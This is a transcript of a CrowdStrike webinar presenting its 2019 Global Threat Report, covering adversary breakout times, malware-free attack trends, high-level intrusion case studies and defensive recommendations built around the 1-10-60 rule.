Adversary Tradecraft and the Importance of Speed to Take Action
"Breakout Time"—the time it takes for an intruder to jump from a compromised machine and move laterally through an organization’s network—is a crucial window to stop a breach, but isn’t the only metric security leaders need to know about.
When an attack is in progress, organizations have on average one minute to detect it, ten minutes to understand it and one hour to contain it. Is your organization ready to meet the 1/10/60 challenge?
Join us for this session as we take an in-depth look at the findings in CrowdStrike’s 2019 Global Threat Report, and discuss the techniques and unique behaviors of today’s adversaries while highlighting the average time an organization needs to take action. Enjoy the video presentation and accompanying transcript below, by Chris Kachigian.
About Chris Kachigian
Chris Kachigian is the Sr. Director of Global Solutions Architecture at CrowdStrike. Chris is responsible for technical aspects of CrowdStrike’s Global Strategic Partnerships. Chris helps our partners deliver better outcomes to customers by solving their security challenges with CrowdStrike’s platform.
Chris comes to CrowdStrike from Tanium where he led the Partner Technology Integration program from their Technical Account Management organization. Before Tanium, Chris was at Intel as the Sr. Principle Engineer leading the Cyber Security Pathfinding team focusing on hardware security at Intel’s Data Center Group.
Before Intel, Chris spent the majority of his career at Lockheed Martin focusing on full lifecycle cyber security challenges for their customers in the US, UK, Australia, and supported some exploratory work in Europe and the middle east. He also led their Cyber Security Innovation Program at the NexGen Cyber Innovation and Technology Center focusing on Cyber (Security, Innovation and Operations), Mobility, Cloud and Digital Transformation. Before that at Lockheed he was a cyber security and IT operations SME.
All right, let's get this thing started. Well, hello everybody. Welcome to the CrowdStrike and Ivanti webinar here and today I'm going to be covering adversary tradecraft and the importance of speed. My name is Chris Kachigian. I'm a Senior Director for Solutions Architecture here at CrowdStrike. I have over 15 years professional experience and it's been a fun set of experiences that I've had. I was able to grow up in the defense industrial base working for a very large defense contractor so I could basically learn the basics of IT operations, internal IT security, doing external base security for some of our largest customers before I moved into the commercial product space. Then after that I got into startup-land and it has been a heck of a run ever since and landed me here at CrowdStrike and it's been a great show so far.
My job here is to help customers, VR partners, to enable better security outcomes using solutions designed and built around the CrowdStrike platform. What I'm going to go through today are a couple different things. First and foremost, I'm going to cover the threat landscape. I'm going to cover some of the pieces about our adversaries, get into some use cases and other things we've seen from the field, but I do want to note and call out that the data sets that I'm going to be covering is from our 2019 Global Threat Report. Now, this is from the entire, I guess, the full year report that was released a little bit earlier this year. We have subsequently released a couple of updates for things like U3 and some other pieces. Just bear in mind that this data set comes from the full report from the previous year. There could be some other newer pieces out there that we'll have links to towards the end and we'll make sure we get those in your hands.
Without further ado, what we do here at CrowdStrike is we stop breaches. It's nice and simple and we do it in a way that is a complete departure from the way that security has been done in the past. We deliver superior endpoint protection on all of your endpoints, Windows, Mac, Linux, mobile, iOS, Android, Containers, et cetera, with a single lightweight agent and that is managed from the cloud. The reason we're able to do all this is that we are building a platform that encompasses the necessary intelligence, the innovation and human capital to stop breaches. This approach allows us to outpace the attackers and ultimately provide you with better protection. Let's take a closer look at the platform here and give you all a better understanding of what's going on. About seven years ago, our founders had a vision and that is if you want to stop breaches, you need to take a holistic approach.
Cloud delivery was core component to this brand new approach, but was also ... know in order to be truly effective in stopping breaches, we had to inform the platform with the deep security expertise. From day one we built into the platform a couple different tenants, specifically endpoint security, threat intelligence, manage endpoint hunting alongside with incident response and strategic services. This model has also emerged as the new standard within industry. Gartner has basically redefined the endpoint protection category to align with this and a number of new competitors have came out with a very similar story. This is just strong validation that our approach, while often imitated, is correct, but is also never duplicated either.
Let's get into the number for you all and lets look at some of the datasets. First and foremost, Threat Graph. A Threat Graph is what powers the CrowdStrike platform. It allows us to have global visibility of all different attack types, targets and we are able to understand trends and see the patterns. Just from a capabilities perspective, we process about 280 billion events per day and those numbers are increasing all the time. We see roughly 4 million peak events per second. Again, that's increasing more than the average, a little bit higher than 3 million events per second. Threat graph is this brains behind the CrowdStrike platform and that's where a significant portion of a lot of the artificial intelligence machine learning happens for us and allows us to be able to do things at just such a massive scale. When we have our Falcon agents or as we'll call them internally, sensors, are deployed in more than 176 countries, which captures just a ton of data. Right now, we're actually approaching almost 2 trillion events per week and again, just like the events per day, the numbers are just growing at this point.
Now, one thing that we also did last year was we made the move for the entire Falcon platform to the MITRE ATT&CK framework away from the Lockheed Martin Kill Chain. We did this so we can actually get a basically stronger common language or framework that allows us and an organization, basically, to understand the nuances of intrusion activity. It basically allowed us to go another step deeper, just understand it a bit more things than just additional context. One of the things we've taken away and we've noticed from the migration was that we've actually seen a prevalence, a shift from malware to more malware-free attacks. This will be things like scripting, things that are only staying in memory, utilizing and abusing built-in system utilities, kind of, living off the land techniques.
This is a heat map that is generated by our OverWatch organization. This is definitely a bit of an eye chart, but we do some overall mapping, utilizing all the telemetry we collect comes in through Threat Graph that was mentioned just a slide or two ago and we're able to build some of the patterns and just a lot of the activity and techniques that are used by the adversary groups. I'll just hit these up because it's some of the highest ... the hottest from the heat map. Here's just a quick view in so it's much easier for you all to see. Again, this is just some of the data was collected from our Overwatch organization, but from some of the tactics and techniques that are utilized use of valid slash stolen accounts.
From the execution side of the house, we're seeing an increase from the command line activity, but also a lot of abuse of PowerShell and overall scripting within the organizations. Then, once again, from a privileged escalation perspective where they're able to dump things like [ALSAS 00:06:39] and others to get other valid accounts, get these pieces of information, move laterally through the environment and, overall, just a reek hell and havoc for some of our customer sets.
All right. I mentioned this, the shift away from just traditional malware. Malware is pretty simple, although some of it is complex, but the concept of malware is that it is a piece of malicious binary or something else that is written to disk and that it's a file that attempts to run on an endpoint. Now the, what I mentioned just before was the uptick of the malware-free attacks.
This is where initial tactic is basically where nothing is being written to disk. Basically, things are either executed from memory or it is a basically abusing of a valid credential using tools and utilities that are actually built into the operating system themselves. Basically, to try and avoid detection just, again, have longer than the infrastructure. If I take a look at malware first, malware-free by industry, we're going to go through here and red is for the malware-free. The gray bars are malware. Towards the top it's sorted from the malware-free in descending order. We see that organizations in areas such as media, technology, academia, energy and healthcare, they tend to get ... lead the way with regard to getting targeted from a malware-free types of attacks and techniques used by the adversary groups.
The inverse side, if you look down towards the bottom, we see lots of whether it's with oil, gas, pharmaceutical, insurance, financial, lots of them are targeted from heavily, more heavily on the malware side of the house. Just to, again, allow you the picture to see from an organizational or industry type perspective.
Now, if we go into the malware-free by region, again, the details of all the stuff that you'll be able to find in the overall Threat Report we'll have linked at the end of the document, but from a North American perspective, we see just a little bit [inaudible 00:08:42] is really the most targeting of use of ... get from an average perspective of malware-free type attacks.
Again, just from a malware perspective, again, North America has the least amount. Now, if you look at things like Lat Am it's a little bit different. We see roughly about 25% of the attack base are using malware-free, where as the traditional malware works, again, or at least it's being used in 75% of the time. Middle East and Pacific ends up being around an average just a probably about 60 to 65% on average of malware type attacks versus the roughly 35 to 40% of malware-free.
All right. One of the things here to understand is when we, and this is going to come up to the speed conversation just a little bit, is understanding what some of the adversary groups are here. We look at the BEAR adversary group, and this is the average 18 minutes and 49 seconds. By the time they establish a beachhead to moving out laterally within different organizations. Then, if we look a little bit towards the middle of the track here, we have the PANDA, which is the related to the the Chinese threat actor groups. They average four hours and 26 minutes, but then we get down into the SPIDERs, which are the criminal organizations. We see on average that they have about nine hours, 42 minutes before the breakout or that the lateral shifts are happening within the infrastructure. This is going to be a good base knowledge for you to understand. The speed and topics we're going to get and then why you need to to care about what's going on.
All right. Let's jump into actually understanding of the adversaries and some of their motivations. Going to cover three different types here. Start with nation state, shifted eCrime and then jump into the ever popular hacktivist area. Most times, even all the time, we say you don't have a malware problem, you have an adversary problem and this is things ... Attributing back to these particular groups, it can get very granular down to groups themselves or to the individuals taking part within those groups. If we look at the motivations, we'll start here with the far left hand side, which is these state sponsored actors.
Oftentimes they're, it's driven by espionage. This is, if we look at the BEAR and the PANDA actor groups especially. Originally, we focused on the top four, so the BEARS, the PANDAS ... The claim is and the KITTENS, so Russia, China, North Korea and Iran, but we have also seen an uptick of others that have been growing over time. Now, if we look, shift over to the eCrime portion, this is where you're going to find folks that are oftentimes financially motivated and you're looking at things like financial gain. We do see some bleed over and overlap with some of these eCrime groups. You know most of the time the targeting is for profits. Now, last and definitely not least, is over the hacktivist side so the non-nation state actor sets and you know these are oftentimes politically or socially motivated. It is even sometimes just looking for some attention on various topics.
Ideology falls into a lot of the things that they're looking ... they're doing, but some of these examples could be things like they are anti-capitalism or we see things like geopolitical concerns like we've seen within Ukraine or, even more recently, Hong Kong or even for ... Oftentimes, it happens quite a bit in the Middle East.
Now, sometimes, we'll actually see that state sponsored actors will try to change their ways to look like criminal or hacktivist groups themselves or activity. A good example here would be the Olympic Destroyer and, basically, they tried to make them look like the North Koreans were doing it. In this particular case though they changed their tool chain and how it was compiled, et cetera. The interior tool chain looked like the North Koreans, but exterior tool chain looked like a different threat actor group, which it was eventually tied back to.
All right, now jumping into some of the details about these state sponsored activities. Beginning with the country adversaries, we can see that China remain the most prolific during the 2018 calendar year. GOBLIN PANDA and WICKED PANDA, specifically, underscore that the very admissions of the Chinese based target intrusions activity with GOBLIN PANDA representing the intelligence collection within the region and Wicked Panda representing the broader mission that was targeted with a swaths of sectors and countries. The North Korean based actors shot up to the number two spot, at least as far as, observed volume of adversary activity relating to 2018. LABYRINTH PANDA led the way, but a significant amount of activity with some of the newly named CHOLLIMA'S like a RICOCHET and VELVET. The North Korean target intrusions overall emissions is an interesting one combining both traditional Intel gathering but also operations, luckily focused on currency generation, If the country that is still mostly cut off from the global financial system.
Iranian adversaries we're very active during 2018 as well. HELIX KITTEN lead the way, but we're also starting to see an emergence of new adversaries and new TTPs from Iran, which is something to watch out for, for the remainder of this year.
Somewhat surprisingly, we also saw the Russians fall down on the list of overall observed activity compared to North Korea and Iran, but Russian adversaries were still very active last year. A FANCY BEAR, in particular, continued its operations and is constantly updating its its tooling and toolkits.
All right, I'm going to have to take you through just some of the use cases and and just tales from the field that we've seen with our Overwatch organization. Now, in a this particular event, it was a unidentified state sponsored adversary that was targeting Linux networks at a telecom provider and this particular point was that there was a compromised Linux host that was defensive of Asian was employed and then they caused some interesting things happening there. They compromised the Linux host and used it as a beachhead. We then observe them using base64 encoded Perl commands and GNU tar for staging and exfiltration of configuration files and batch history. There's also extensive efforts to cover their tracks and they also left a backdoored version of of the SSH daemon to allow their return.
Also too, with regard to the extensive covering their tracks, we've seen them do a lot of stuff with regard to tampering and deleting log files. They were timestamping the modified files themselves and also where they were replacing binaries to hide the IP use tools, et cetera.
This is a little bit blurry the ... of the screenshot will be included in some of the pieces. That little blue circle, that's highlighted there is actually it's unique, because they actually used a unique piece of malware to attack a this particular customer set.
All right, now moving on here. We're going to cover your MUMMY SPIDER, which is, personally, one of my favorite adversary groups just because of their persistence, their ingenuity. They run overall eight an hour delivery service for lack of a better way of saying it. They do support multiple cyber or eCrime organizations and other adversary groups. They tend to focus themselves on geo-targeting with a lot of focuses of recent on US, UK and Canada. We've also seen some activity in Europe and Germany as well.
All right, so continuing down the path here with MUMMY SPIDER. We've seen them employing a lot of big game hunting for this year. Basically, it's a phishing campaign that's targeting enterprises and because they, generally speaking, tend to have more money they can pay out for a ransom and other pieces. Hence the big game hunting. We had a significant phishing campaigns that affected more than 270 CrowdStrike customers in November of 2018. MUMMY SPIDER utilizing Emotet tends to utilize macro enabled Word document files that are sent as an email attachment. Which of these ... Also, worth noting can be easily blocked by Falcon just so everyone's aware.
Now, once these macros are enabled, the document launches an Office gated PowerShell command. Now, this particular set of capabilities, it ends up reaching out to a commitment and control infrastructure that is retrieved and installed the Emotet driver. Then the dropper downloaded Emotet as a first stage implant, which is also, again, Falcon does detect and block. Now the infected hosts would establish a the communications with known Emotet command and control servers, basically creating persistence. Additional second stage malware retrieved and installed based on geolocation of the affected hosts. In this particular case we've seen Bokbot banking trojan used by LUNAR SPIDER, a TrickBot banking trojan being used by WIZARD SPIDER Then, again, all these things are blocked by the Falcon sensor or agent.
The observed second stage malware that was downloaded, illustrated that they are continually collaborating with other criminal organizations. Again, just to further their goals. The one thing I do actually have to call out, because again, I just really enjoyed how they did it. We've even seen things where they have basically multi-headed a command and control servers now. So, again there, with different encryption keys. Just kind of really cool for how they're differentiating themselves and need to evolve and advance their tactics and techniques here.
All right. Moving on, let's cover STARDUST COLLIMA. Then, just to reiterate, the Collima adversary group does stem from North Korea and this particular one is targeting the financial industry. A lot of what they do is they use valid or stolen credentials and they use extensive living off the land techniques, which we covered as part of the malware free stuff we just had spoken about.
Now, this particular threat actor establishes a beachhead within the network and they move laterally. You'll see things like scheduled tasks and WMI employing things with PowerShell and basically create reverse shells out as well as RDP tunnels again. Once they can get in and they establish a persistence, they have a way back in. The valid credentials, in this particular case, belonged to some network administrators and they also basically targeted the domain controllers some of the first host access from the beachhead. They use some of the built in active directive utilities to basically do data dumps and then hooked [ALSAS 00:19:56] and attempt to dump more credentials. Basically, they can use the building utility, export the data, get a better understanding what the environment looked like and then dumped their credentials and try to shift around and move laterally as a new user within the environment.
Also, from this particular adversary group, they also access the payment and processing server indicating they were looking at either financial motivation, again, from the potential perspective. Now the PowerShell implant that they used access to documents that also contained the sensitive information from the server itself. The implanted piece was actually a unique tool that was written log.exe, Which actually used multiple purposes including executing malicious DLL payloads as well as creating of some of these network tunnels. Log.exe actually injected into a legitimate ... injected payloads into legitimate Explorer processes, into the Explorer memory space, again, we're looking to avoid detection and then ... Now, after this customer stopped a breach with OverWatch assistance, the incident response team discovered that initial vector was actually a publicly exposed unsecured network monitoring system that did not have the Falcon sensor. Just one of the key takeaways here. It's one of those get Falcon out there on your platforms. A shameless plug, but it works and it's very good at what it does.
All right, taking a quick look at a services case study. Just shifting away from some of the lessons learned observed from the OverWatch side of the house. Here is a sample of where a adversary group used and employee satisfaction survey. There was actually a front for a payroll heist. This was actually a pretty cool and intuitive. In this particular case, they had a spearfish email that presented itself as an invitation from an external company to participate in an employee survey. They specifically were targeting an executive within the organization. That executive also didn't think that an employee satisfaction survey had been authorized so he went ... He or she went to the survey to check it out.
When they actually opened up that survey page, it was hosted on a compromised, unmonitored website that was operated by a small library in the US. It actually employed a web browser vulnerability, which expose the hash of the victims credentials. What that adversary group then did was crack the hash offline and utilized the password and affirmed the cracked hash to access the enterprise single sign on system and the executive's email.
Now, the adversary also observed that the enterprise was preparing to outsource payroll to a third party. You'd just be looking for an opportunity perspective with change comes confusion and therefore opportunity for adversaries to employee what they do. Now, that adversary actually requested password resets for multiple users on this third party payroll portal and the reset messages were intercepted before the legitimate users could actually see them. Now, what does adversary did is they redirected the payroll to an online bank, which the intent was to extract the money via gift cards.
Then we can't not talk about Anonymous, to some of their operations getting very, very busy in the hacktivist space. Some of the key takeaways though, they obviously are supporting multiple regional protests all around the world. We can see just from some of these popped up here that we call out on the slide itself. I'm won't go through these in detail. You can just look them up offline.
All right, so we can't go through the observations from the field and not talk about recommendations from what we've seen. First and foremost, you know, basic security hygiene is still key and still matters. We start off with the the user awareness to combat the phishing and other social related, social engineering techniques. We see this continually employed and we humans are, I mean, not even being cliche, the weakest link. It's effective and it works. Anything that you can do to make your users more aware of what's happening is always good.
Now these next two bullets near and dear to my heart. Again, even shameless plug for for Avanti. We can do the and solve the asset management, the software delivery, sorry, software inventory as well as the vulnerability and patch management processes with the combination of the Avanti technologies that you have there between the EPM and vulnerability manager. We can actually fuse some of the IT operations and that's IT security datasets with the cybersecurity platforms within CrowdStrike to give you absolutely a fantastic visibility that just gets the job done.
Combining those two technologies will actually allow you to, again, find assets. You need asset management, because you can't protect what you don't know about. From the software inventory perspective, whether it's using the combination of CrowdStrike's Discover or EPM or the vulnerability stuff within Avanti pieces. Again, have that visibility so you can find and close said vulnerabilities and reduce the risks and the exposures. Then from the vulnerability and patch management perspective, again, you had the vulnerability scanners actually scan to confirm they actually did the stuff that you did. That was the work that you did to actually close the patches and then the patch management solution again to discover when you're missing those pieces and get them pushed out there in a very nearly [atomic 00:25:39] fashion. Now that I'm done harping on those for four in particular aspects of it. Let's shift over into multifactor authentication.
MFA combined with with privilege management will go a really, really long way into ensuring that even if you do have a user account that is compromised and you have ... They actually get to the actual credentials, the multifactor authentication will at least serve as a extra step in the way for the adversaries to get in and land within the environment. Hopefully, you'll have some of the privilege measurement credential pieces set up in a credential monitoring so you can see when the abuse attempts are happening so you can either shut that stuff down or actually lead up to a what other actions you plan on taking. Then, obviously, from password protection perspective for endpoint security software, protect the stuff that you use to protect your infrastructure. I can't stress that enough.
All right. Looking beyond the malware, basically strengthen your defenses against modern attack. As we were covering the pieces in the ... earlier in the slide, we made of malware-free, right? So this is where the adversaries are employing the TTPs, where they're using the native tools for a nefarious intent. Whether it's utilizing stuff like the building active directory tools or the certificate utilities. Weaponizing PowerShells as a for example. they're doing these things above Windows and non-Windows platforms alike. This, obviously, it's alternative is to actually writing a malware, because they can use all the building system utilities to actually do everything, whether it's from gather additional data, establish persistence and use all utilize all those pieces for command and control.
All right. Then lastly, you have to look at your partners to help solve some of the skill shortage. Behind just about every attack there is a human adversary, all right? They are constantly changing their TTPs in response to technical controls that you, me, us together are collectively putting down into place. Proper defense requires effective and dedicated people security personnel. Some of the things we've been seeing is that a lot of organizations, especially when you're ... they're competing in a basically the global cybersecurity race or sometimes, we'll call it challenged, to get access to good talent. That is within the ... how work at the companies where they have and they want to operationalize. In this particular case, working with say us and Avanti and their partners can utilize the best in class external solution providers they can to help you fill the skills gap and what is hopefully a cost effective manner for you to do that.
All right. Let's revisit this concept of a breakout time by region, by the regional adversaries. I have my call to action for you coming up here in a minute. We'll just take a look here. That the BEAR's average just under 19 minutes and you have the SPIDERS are about nine hours and 42 minutes. This matters because in 2017, we actually noticed that the adversaries took one hour and roughly 58 minutes for a breakout time. Interestingly enough, the time increased for 2018. The average we saw in the 2018 timeframe was the actual, the threat actors took four hours and 37 minutes on average to breakout from their initial beachhead. Now, a lot of this stuff I don't have some definitive answers for you, but my ... some of the stuff that myself and, everyone else here at CrowdStrike believe, is that it is ... Some of it is attributed to you slower moving adversaries, which you can see there's a few here.
But also too, we do believe that organizations are investing into better controls and better technology. They're adopting things like CrowdStrike and others like us. Other next generation technologies that are significantly more effective against adversaries and their tradecraft and again slowing them down.
Let's talk about speed and speed is everything. We're going to hit what CrowdStrike has been talking about a lot lately. The 1-10-60 rule and it's, actually, it's a very simple concept and that concept is that within a minute of something happening so whether it's a piece of malware, a adversary that has a human on the keyboard with a go active environment, you want to be able to detect and know what's happening in a minute or less.
Shifting over to the next portion of it is give you time to investigate. Within 10 minutes have all the proper tooling to give you the data so that you have ... so you can complete, again, an investigation perspective. You can understand what's happening within a 10 minute timeframe.
Then lastly, the third portion of the step is the time to remediate and contain. You want to basically be able to detect, investigate, and then remediate and contain whatever the issue is within 60 minutes. If I actually just go back a couple slides here, and we look at this breakout time per region. Now granted, we're talking in averages so the BEAR's average is, again, just under 19 minutes and the SPIDERS are just under 10 hours. If you can employee that 1-10-60 model, you have the opportunity to beat out all but some of the fastest adversary groups within the infrastructure. I started to see within the global threat space.
I just want to say, thank you very much for your time today. I recommend you go grab the full threat intel report, which is available at this particular link. Then when you do that, I would also recommend that you grab some of the quarterly updates we release as well. There's some fantastic data, especially with updates for some of the quarterly trends that are things that we're seeing. I think, it'll ... The back of data that we have within those will give you a rock solid foundation for you to build up and improve on your security operations, your cybersecurity posture in general and overall sets you up for better success within a security space.